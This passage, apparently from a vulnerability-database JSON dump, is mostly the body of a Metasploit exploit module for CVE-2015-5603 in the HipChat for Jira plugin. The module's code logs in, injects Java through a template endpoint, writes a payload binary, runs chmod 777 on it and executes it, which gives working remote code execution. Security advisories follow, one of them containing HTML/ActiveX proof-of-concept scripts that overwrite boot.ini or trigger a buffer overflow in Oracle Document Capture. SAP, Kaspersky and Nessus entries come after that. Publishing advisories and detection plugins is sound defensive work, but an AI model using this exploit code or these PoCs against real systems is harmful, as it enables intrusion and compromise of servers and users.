sure the account you're using isn't\n protected by captcha. By default, Java payload will be used because it is cross-platform,\n but you can also specify which native payload you want (Linux or Windows).\n\n HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions\n between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with\n a vulnerable copy of HipChat.\n\n When using the check command, if you supply a valid username and password, the module\n will be able to trigger the bug and check more accurately. If not, it falls back to\n passive, which can only tell if the target is running on a Jira version that is bundled\n with a vulnerable copy of Hipchat by default, which is less reliable.\n\n This vulnerability was originally discovered internally by Atlassian.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Chris Wood', # PoC\n 'sinn3r' # Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2015-5603' ],\n [ 'EDB', '38551' ],\n [ 'BID', '76698' ],\n [ 'URL', 'https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html' ]\n ],\n 'Targets' =>\n [\n [ 'HipChat for Jira plugin on Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\n [ 'HipChat for Jira plugin on Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\n [ 'HipChat for Jira plugin on Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8080\n },\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 28 2015',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n # Auth is required, but when we use the check command we allow them to be optional.\n OptString.new('JIRAUSER', [false, 'Jira Username', '']),\n OptString.new('JIRAPASS', [false, 'Jira Password', '']),\n OptString.new('TARGETURI', [true, 'The base to Jira', '/'])\n ])\n end\n\n def post_auth?\n true\n end\n\n\n # Returns a cookie in a hash, so you can ask for a specific parameter.\n #\n # @return [Hash]\n def get_cookie_as_hash(cookie)\n Hash[*cookie.scan(/\\s?([^, ;]+?)=([^, ;]*?)[;,]/).flatten]\n end\n\n\n # Checks the target by actually triggering the bug.\n #\n # @return [Array] Exploit::CheckCode::Vulnerable if bug was triggered.\n # Exploit::CheckCode::Unknown if something failed.\n # Exploit::CheckCode::Safe for the rest.\n def do_explicit_check\n begin\n cookie = do_login\n # I don't really care which command to execute, as long as it's a valid one for both platforms.\n # If the command is valid, it should return {\"message\"=>\"0\"}.\n # If the command is not valid, it should return an empty hash.\n c = get_exec_code('whoami')\n res = inject_template(c, cookie)\n json = res.get_json_document\n if json['message'] && json['message'] == '0'\n return Exploit::CheckCode::Vulnerable\n end\n rescue Msf::Exploit::Failed => e\n vprint_error(e.message)\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n # Returns the Jira version\n #\n # @return [String] Found Jira version\n # @return [NilClass] No Jira version found.\n def get_jira_version\n version = nil\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa')\n })\n\n unless res\n vprint_error('Connection timed out while retrieving the Jira version.')\n return version\n end\n\n metas = res.get_html_meta_elements\n\n version_element = metas.select { |m|\n m.attributes['name'] && m.attributes['name'].value == 'ajs-version-number'\n }.first\n\n unless version_element\n vprint_error('Unable to find the Jira version.')\n return version\n end\n\n version_element.attributes['content'] ? version_element.attributes['content'].value : nil\n end\n\n\n # Checks the target by looking at things like the Jira version, or whether the Jira web app\n # exists or not.\n #\n # @return [Array] Check code. If the Jira version matches the vulnerable range, it returns\n # Exploit::CheckCode::Appears. If we can only tell it runs on Jira, we return\n # Exploit::CheckCode::Detected, because it's possible to have Jira not bundled\n # with HipChat by default, but installed separately. For other scenarios, we\n # return Safe.\n def do_passive_check\n jira_version = get_jira_version\n vprint_status(\"Found Jira version: #{jira_version}\")\n if jira_version && jira_version >= '6.3.5' && jira_version < '6.4.11'\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n # Checks the vulnerability. Username and password are required to be able to accurately verify\n # the vuln. If supplied, we will try the explicit check (which will trigger the bug, so should\n # be more reliable). If not, we will try the passive one (less accurately, but better than\n # nothing).\n #\n # @see #do_explicit_check\n # @see #do_passive_check\n #\n # @return [Array] Check code\n def check\n checkcode = Exploit::CheckCode::Safe\n\n if jira_cred_empty?\n vprint_status(\"No username and password supplied, so we can only do a passive check.\")\n checkcode = do_passive_check\n else\n checkcode = do_explicit_check\n end\n\n checkcode\n end\n\n\n # Returns the Jira username set by the user\n def jira_username\n datastore['JIRAUSER']\n end\n\n\n # Returns the Jira password set by the user\n def jira_password\n datastore['JIRAPASS']\n end\n\n\n def service_details\n super.merge({ post_reference_name: self.refname })\n end\n\n\n # Returns a valid login cookie.\n #\n # @return [String]\n def do_login\n cookie = ''\n\n prerequisites = get_login_prerequisites\n xsrf = prerequisites['atlassian.xsrf.token']\n sid = prerequisites['JSESSIONID']\n uri = normalize_uri(target_uri.path, 'rest', 'gadget', '1.0', 'login')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' },\n 'cookie' => \"atlassian.xsrf.token=#{xsrf}; JSESSIONID=#{sid}\",\n 'vars_post' => {\n 'os_username' => jira_username,\n 'os_password' => jira_password,\n 'os_captcha' => '' # Not beatable yet\n }\n })\n\n unless res\n fail_with(Failure::Unknown, 'Connection timed out while trying to login')\n end\n\n json = res.get_json_document\n\n if json.empty?\n fail_with(Failure::Unknown, 'Server returned a non-JSon response while trying to login.')\n end\n\n if json['loginSucceeded']\n cookie = res.get_cookies\n elsif !json['loginSucceeded'] && json['captchaFailure']\n fail_with(Failure::NoAccess, \"#{jira_username} is protected by captcha. Please try a different account.\")\n elsif !json['loginSucceeded']\n fail_with(Failure::NoAccess, 'Incorrect username or password')\n end\n\n store_valid_credential(user: jira_username, private: jira_password, proof: cookie) # expands to store cookie\n\n cookie\n end\n\n\n # Returns login prerequisites\n #\n # @return [Hash]\n def get_login_prerequisites\n uri = normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa')\n res = send_request_cgi({ 'uri' => uri })\n\n unless res\n fail_with(Failure::Unknown, 'Connection timed out while getting login prerequisites')\n end\n\n get_cookie_as_hash(res.get_cookies)\n end\n\n\n # Returns the target platform.\n #\n # @param cookie [String] Jira cookie\n # @return [String]\n def get_target_platform(cookie)\n c = get_os_detection_code\n res = inject_template(c, cookie)\n json = res.get_json_document\n json['message'] || ''\n end\n\n\n # Returns Java code that can be used to inject to the template in order to write a file.\n #\n # @note This Java code is not able to properly close the file handle. So after using it, you should use #get_dup_file_code,\n # and then execute the new file instead.\n #\n # @param fname [String] File to write to.\n # @param p [String] Payload\n # @return [String]\n def get_write_file_code(fname, p)\n b64 = Rex::Text.encode_base64(p)\n %Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) |\n end\n\n\n # Returns the Java code that gives us the remote Java home path.\n #\n # @return [String]\n def get_java_path_code\n get_java_property_code('java.home')\n end\n\n\n # Returns the OS/platform information.\n #\n # @return [String]\n def get_os_detection_code\n get_java_property_code('os.name')\n end\n\n\n # Returns the temp path for Java.\n #\n # @return [String]\n def get_temp_path_code\n get_java_property_code('java.io.tmpdir')\n end\n\n\n # Returns a system property for Java.\n #\n # @param prop [String] Name of the property to retrieve.\n # @return [String]\n def get_java_property_code(prop)\n %Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() |\n end\n\n\n # Returns the Java code to execute a jar file.\n #\n # @param java_path [String] Java home path\n # @param war_path [String] The jar file to execute\n # @return [String]\n def get_jar_exec_code(java_path, war_path)\n # A quick way to check platform instead of actually grabbing os.name in Java system properties.\n if /^\\/[[:print:]]+/ === war_path\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_path, '/bin/java')\n cmd_str = %Q|#{normalized_java_path} -jar #{war_path}|\n else\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_path, '\\\\bin\\\\java.exe')\n war_path.gsub!(/Program Files/, 'PROGRA~1')\n cmd_str = %Q|cmd.exe /C #{normalized_java_path} -jar #{war_path}\"|\n end\n\n %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd_str}').waitFor() |\n end\n\n\n # Returns Java code that can be used to inject to the template in order to execute a file.\n #\n # @param cmd [String] command to execute\n # @return [String]\n def get_exec_code(cmd)\n %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd}').waitFor() |\n end\n\n\n # Returns Java code that can be used to inject to the template in order to chmod a file.\n #\n # @param fname [String] File to chmod\n # @return [String]\n def get_chmod_code(fname)\n get_exec_code(\"chmod 777 #{fname}\")\n end\n\n\n # Returns Java code that can be used to inject to the template in order to copy a file.\n #\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\n # It is meant to be used with #get_write_file_code.\n #\n # @param fname [String] The file to copy\n # @param new_fname [String] The new file\n # @return [String]\n def get_dup_file_code(fname, new_fname)\n if fname =~ /^\\/[[:print:]]+/\n cp_cmd = \"cp #{fname} #{new_fname}\"\n else\n cp_cmd = \"cmd.exe /C copy #{fname} #{new_fname}\"\n end\n\n get_exec_code(cp_cmd)\n end\n\n\n # Returns a boolean indicating whether the module has a username and password.\n #\n # @return [TrueClass] There is an empty cred.\n # @return [FalseClass] No empty cred.\n def jira_cred_empty?\n jira_username.blank? || jira_password.blank?\n end\n\n\n # Injects Java code to the template.\n #\n # @param p [String] Code that is being injected.\n # @param cookie [String] A cookie that contains a valid JSESSIONID\n # @return [void]\n def inject_template(p, cookie)\n login_sid = get_cookie_as_hash(cookie)['JSESSIONID']\n\n uri = normalize_uri(target_uri.path, 'rest', 'hipchat', 'integrations', '1.0', 'message', 'render')\n uri << '/'\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"JSESSIONID=#{login_sid}\",\n 'ctype' => 'application/json',\n 'data' => { 'message' => p }.to_json\n })\n\n if !res\n # This seems to trigger every time even though we're getting a shell. So let's downplay\n # this a little bit. At least it's logged to allow the user to debug.\n elog('Connection timed out in #inject_template')\n elsif res && /Error report/ === res.body\n print_error('Failed to inject and execute code:')\n vprint_line(res.body)\n elsif res\n vprint_status(\"Server response:\")\n vprint_line res.body\n end\n\n res\n end\n\n\n # Checks if the target os/platform is compatible with the module target or not.\n #\n # @return [TrueClass] Compatible\n # @return [FalseClass] Not compatible\n def target_platform_compat?(target_platform)\n target.platform.names.each do |n|\n if /^java$/i === n || /#{n}/i === target_platform\n return true\n end\n end\n\n false\n end\n\n\n # Returns the normalized file path for payload.\n #\n # @return [String]\n def normalize_payload_fname(tmp_path, fname)\n # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.\n if /^\\/[[:print:]]+/ === tmp_path\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\n else\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\n end\n end\n\n\n # Returns a temp path from the remote target.\n #\n # @param cookie [String] Jira cookie\n # @return [String]\n def get_tmp_path(cookie)\n c = get_temp_path_code\n res = inject_template(c, cookie)\n json = res.get_json_document\n json['message'] || ''\n end\n\n\n # Returns the Java home path used by Jira.\n #\n # @param cookie [String] Jira cookie.\n # @return [String]\n def get_java_home_path(cookie)\n c = get_java_path_code\n res = inject_template(c, cookie)\n json = res.get_json_document\n json['message'] || ''\n end\n\n\n # Exploits the target in Java platform.\n #\n # @return [void]\n def exploit_as_java(cookie)\n tmp_path = get_tmp_path(cookie)\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n jar_fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\n jar = payload.encoded_jar\n java_home = get_java_home_path(cookie)\n register_files_for_cleanup(jar_fname)\n\n if java_home.blank?\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\n else\n print_status(\"Found Java home path: #{java_home}\")\n end\n\n print_status(\"Attempting to write #{jar_fname}\")\n c = get_write_file_code(jar_fname, jar)\n inject_template(c, cookie)\n\n print_status(\"Executing #{jar_fname}\")\n c = get_jar_exec_code(java_home, jar_fname)\n inject_template(c, cookie)\n end\n\n\n # Exploits the target in Windows platform.\n #\n # @return [void]\n def exploit_as_windows(cookie)\n tmp_path = get_tmp_path(cookie)\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)\n exe_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\n exe_new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\n exe_fname.gsub!(/Program Files/, 'PROGRA~1')\n exe_new_fname.gsub!(/Program Files/, 'PROGRA~1')\n register_files_for_cleanup(exe_fname, exe_new_fname)\n\n print_status(\"Attempting to write #{exe_fname}\")\n c = get_write_file_code(exe_fname, exe)\n inject_template(c, cookie)\n\n print_status(\"New file will be #{exe_new_fname}\")\n c = get_dup_file_code(exe_fname, exe_new_fname)\n inject_template(c, cookie)\n\n print_status(\"Executing #{exe_new_fname}\")\n c = get_exec_code(exe_new_fname)\n inject_template(c, cookie)\n end\n\n\n # Exploits the target in Linux platform.\n #\n # @return [void]\n def exploit_as_linux(cookie)\n tmp_path = get_tmp_path(cookie)\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\n register_files_for_cleanup(fname, new_fname)\n\n print_status(\"Attempting to write #{fname}\")\n p = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)\n c = get_write_file_code(fname, p)\n inject_template(c, cookie)\n\n print_status(\"chmod +x #{fname}\")\n c = get_exec_code(\"chmod 777 #{fname}\")\n inject_template(c, cookie)\n\n print_status(\"New file will be #{new_fname}\")\n c = get_dup_file_code(fname, new_fname)\n inject_template(c, cookie)\n\n print_status(\"Executing #{new_fname}\")\n c = get_exec_code(new_fname)\n inject_template(c, cookie)\n end\n\n\n def exploit\n if jira_cred_empty?\n fail_with(Failure::BadConfig, 'Jira username and password are required.')\n end\n\n print_status(\"Attempting to login as #{jira_username}:#{jira_password}\")\n cookie = do_login\n print_good(\"Successfully logged in as #{jira_username}\")\n\n target_platform = get_target_platform(cookie)\n print_status(\"Target being detected as: #{target_platform}\")\n\n unless target_platform_compat?(target_platform)\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\n end\n\n case target.name\n when /java$/i\n exploit_as_java(cookie)\n when /windows$/i\n exploit_as_windows(cookie)\n when /linux$/i\n exploit_as_linux(cookie)\n end\n\n end\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_good(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jira_hipchat_template.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "description": "Information disclosure, XXE injection, code execution, DoS.", "modified": "2015-06-29T00:00:00", "published": "2015-06-29T00:00:00", "id": "SECURITYVULNS:VULN:14556", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14556", "title": "SAP NetWeather multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "description": "\r\nERPSCAN Research Advisory [ERPSCAN-15-006] SAP NetWeaver Portal ReportXmlViewer - XXE\r\n\r\n\r\nApplication: SAP NetWeaver Portal 7.31\r\nVersions Affected: SAP NetWeaver Portal 7.31, probably others\r\nVendor URL: http://SAP.com\r\nBugs: XXE\r\nSent: 09.12.2014\r\nReported: 09.12.2014\r\nVendor response: 10.12.2014\r\nDate of Public Advisory: 18.06.2015\r\nReference: SAP Security Note 2111939\r\nAuthor: Vahagn Vardanyan (ERPScan)\r\n\r\n\r\nDescription\r\n\r\n\r\n1. ADVISORY INFORMATION\r\nTitle: SAP NetWeaver Portal ReportXmlViewer - XXE\r\nAdvisory ID: [ERPSCAN-15-006]\r\nRisk: High\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-006-sap-netweaver-portal-reportxmlviewer-xxe/\r\nDate published: 15.03.2015\r\nVendors contacted: SAP\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\nClass: XXE [CWE-122]\r\nImpact: XML external entity, information disclosure, denial of service, role upload, thread reporting\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-2811\r\n\r\n\r\n3. VULNERABILITY DESCRIPTION\r\nBy default, the parser opens external entities referenced within an XML input, which can then lead to malicious content being parsed.\r\nThis malicious content can reference internal resources, such as files.\r\nThese internal resources can be disclosed in the response to the request, or can be used to perform a denial of service attack on the parsing system, rendering the application content temporarily unavailable.\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\nSAP NetWeaver Portal 7.31\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\nTo correct this vulnerability, install SAP Security Note 2111939.\r\n\r\n\r\n6. AUTHOR\r\nVahagn Vardanyan (ERPScan)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\nSAP XML parser validates all incoming XML requests with a user-specified DTD.\r\n\r\n\r\n8. REPORT TIMELINE\r\nSent: 09.12.2014\r\nReported: 09.12.2014\r\nVendor response: 10.12.2014\r\nDate of Public Advisory: 18.06.2015\r\n\r\n\r\n9. REFERENCES\r\nhttp://erpscan.com/advisories/erpscan-15-006-sap-netweaver-portal-reportxmlviewer-xxe/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security.\r\nERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\nhttp://erpscan.com\r\n", "modified": "2015-06-29T00:00:00", "published": "2015-06-29T00:00:00", "id": "SECURITYVULNS:DOC:32257", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32257", "title": "[ERPSCAN-15-006] SAP NetWeaver Portal ReportXmlViewer - XXE", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "ActiveX components contain insecure methods.\r\n\r\nDigital Security Research Group [DSecRG] Advisory DSECRG-11-006 (internal\r\n#DSECRG-09-066) \r\n\r\n\r\nApplication: Oracle Document Capture \r\nVersions Affected: Oracle Document Capture 10.1.3.5\r\nVendor URL: http://oracle.com\r\nBugs: Insecure method. Buffer overflow.\r\nExploits: YES\r\nReported: 14.12.2009\r\nVendor response: 15.12.2009\r\nDate of Public Advisory: 24.01.2011\r\nCVE: CVE-2010-3599\r\nAuthor: Alexandr Polyakov from DSecRG \r\n\r\nDescription\r\n***********\r\n\r\nInsecure method was founded in NCSECWLib ActiveX control component which is a part\r\nof Oracle Document Capture .\r\nOne of the methods (WriteJPG) can be used to overwrite files on users system and\r\nalso affected to buffer overflow.\r\n\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\nAttacker can construct html page which call vulnerable function "WriteJPG" from\r\nActiveX Object NCSECWLib.\r\n\r\nExample 1 (file overwrite)\r\n******* \r\n\r\n\r\n<html>\r\n<script>\r\ntargetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"\r\nprototype = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long ,\r\nByVal bWriteWorldFile As Boolean )"\r\nmemberName = "WriteJPG"\r\nprogid = "NCSECWLib.NCSRenderer"\r\nargCount = 3\r\n\r\narg1="c:\boot.ini"\r\narg2=1\r\narg3=True\r\n\r\ntarget.WriteJPG arg1 ,arg2 ,arg3 \r\n\r\n</script>\r\n</html>\r\n\r\n\r\nExample 2\r\n*******\r\n\r\n<html>\r\n<script>\r\ntargetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"\r\nprototype = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long ,\r\nByVal bWriteWorldFile As Boolean )"\r\nmemberName = "WriteJPG"\r\nprogid = "NCSECWLib.NCSRenderer"\r\nargCount = 3\r\n\r\narg1=String(13332, "A")\r\narg2=1\r\narg3=True\r\n\r\ntarget.WriteJPG arg1 ,arg2 ,arg3 \r\n\r\n</script></job></package>\r\n\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=306\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\n\r\n\r\nFix Information\r\n*************\r\n\r\nInformation was published in CPU Jan 2011.\r\nAll customers can download CPU patches following instructions from: \r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security: \r\n\r\nIs one of the leading IT security companies in CEMEA, providing information\r\nsecurity consulting, audit and penetration testing services, ERP and SAP security\r\nassessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\r\n\r\nDigital Security Research Group:\r\n\r\nInternational subdivision of Digital Security company focused on research and\r\nsoftware development for securing business-critical systems like: enterprise\r\napplications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking\r\nsoftware. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver"\r\nand service "ERPSCAN Online" which can help customers to perform automated security\r\nassessments and compliance checks for SAP solutions.\r\n\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\nhttp://www.erpscan.com\r\n\r\n\r\n\r\nPolyakov Alexandr. PCI QSA,PA-QSA\r\nCTO Digital Security\r\nHead of DSecRG\r\n______________________\r\nDIGITAL SECURITY\r\nphone: +7 812 703 1547\r\n +7 812 430 9130\r\ne-mail: a.polyakov@dsec.ru \r\n\r\nwww.dsec.ru\r\nwww.dsecrg.com www.dsecrg.ru\r\nwww.erpscan.com www.erpscan.ru\r\nwww.pcidssru.com www.pcidss.ru\r\n\r\n\r\n-----------------------------------\r\nThis message and any attachment are confidential and may be privileged or\r\notherwise protected \r\nfrom disclosure. If you are not the intended recipient any use, distribution,\r\ncopying or disclosure \r\nis strictly prohibited. If you have received this message in error, please notify\r\nthe sender immediately \r\neither by telephone or by e-mail and delete this message and any attachment from\r\nyour system. Correspondence \r\nvia e-mail is for information purposes only. Digital Security neither makes nor\r\naccepts legally binding \r\nstatements by e-mail unless otherwise agreed. \r\n-----------------------------------", "modified": "2011-01-26T00:00:00", "published": "2011-01-26T00:00:00", "id": "SECURITYVULNS:DOC:25551", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25551", "title": "[DSECRG-11-006] Oracle Document Capture ActiveX - Insecure method, buffer overflow", "type": "securityvulns", "cvss": {"score": 9.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:06", "bulletinFamily": "info", "description": "### *Detect date*:\n04/01/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in SAP products. Malicious users can exploit these vulnerabilities to cause denial of service, bypass security restrictions or obtain sensitive information.\n\n### *Affected products*:\nSAP Afaria version 7.0.6001.5 \nSAP Sybase SQL Anywhere versions 11 and 16 \nSAP Mobile Platform version 3 \nSAP NetWeaver version 7.40 \nSAP KERNEL versions 7.00 and 7.40 \nSAP EMR Unwired and Clinical Task Tracker \nSAP Mobile Platform \nSAP NetWeaver Portal 7.31\n\n### *Solution*:\nUpdate to the latest version\n\n### *Impacts*:\nOSI \n\n### *CVE-IDS*:\n[CVE-2015-2820](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2820>)5.0Critical \n[CVE-2015-2819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2819>)5.0Critical \n[CVE-2015-2818](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2818>)5.0Critical \n[CVE-2015-2817](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2817>)5.0Critical \n[CVE-2015-2816](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2816>)7.5Critical \n[CVE-2015-2815](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2815>)6.5Critical \n[CVE-2015-2814](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2814>)6.4Critical \n[CVE-2015-2813](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2813>)5.0Critical \n[CVE-2015-2812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2812>)5.0Critical \n[CVE-2015-2811](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2811>)5.0Critical", "modified": "2019-03-07T00:00:00", "published": "2015-04-01T00:00:00", "id": "KLA10526", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10526", "title": "\r KLA10526Multiple vulnerabilities in SAP products ", "type": "kaspersky", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:14:28", "bulletinFamily": "scanner", "description": "The Oracle Document Capture client installed on the remote host is potentially affected by multiple vulnerabilities :\n\n - An unspecified vulnerability exists in the Import Export utility. An attacker can exploit this to affect integrity. (CVE-2010-3598)\n\n - An information disclosure vulnerability exists related to the EasyMail ActiveX control. (CVE-2010-3595)\n\n - Insecure methods in the 'Actbar2.ocx' and 'empop3.dll' ActiveX controls can be exploited to overwrite arbitrary files. (CVE-2010-3591)\n\n - An error in the 'WriteJPG()' method in the NCSEcw.dll ActiveX control can be exploited to overwrite arbitrary files or potentially cause a buffer overflow.\n (CVE-2010-3599)\n\n - An unspecified vulnerability exists in the Internal Operations component. (CVE-2010-3592)\n\nNote that the NCSEcw.dll control is actually from the ERDAS ECW/JP2 SDK developer toolkit from Intergraph.", "modified": "2018-11-15T00:00:00", "id": "ORACLE_DOCUMENT_CAPTURE_ACTIVEX.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51873", "published": "2011-02-04T00:00:00", "title": "Oracle Document Capture Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51873);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\n \"CVE-2010-3591\",\n \"CVE-2010-3592\",\n \"CVE-2010-3595\",\n 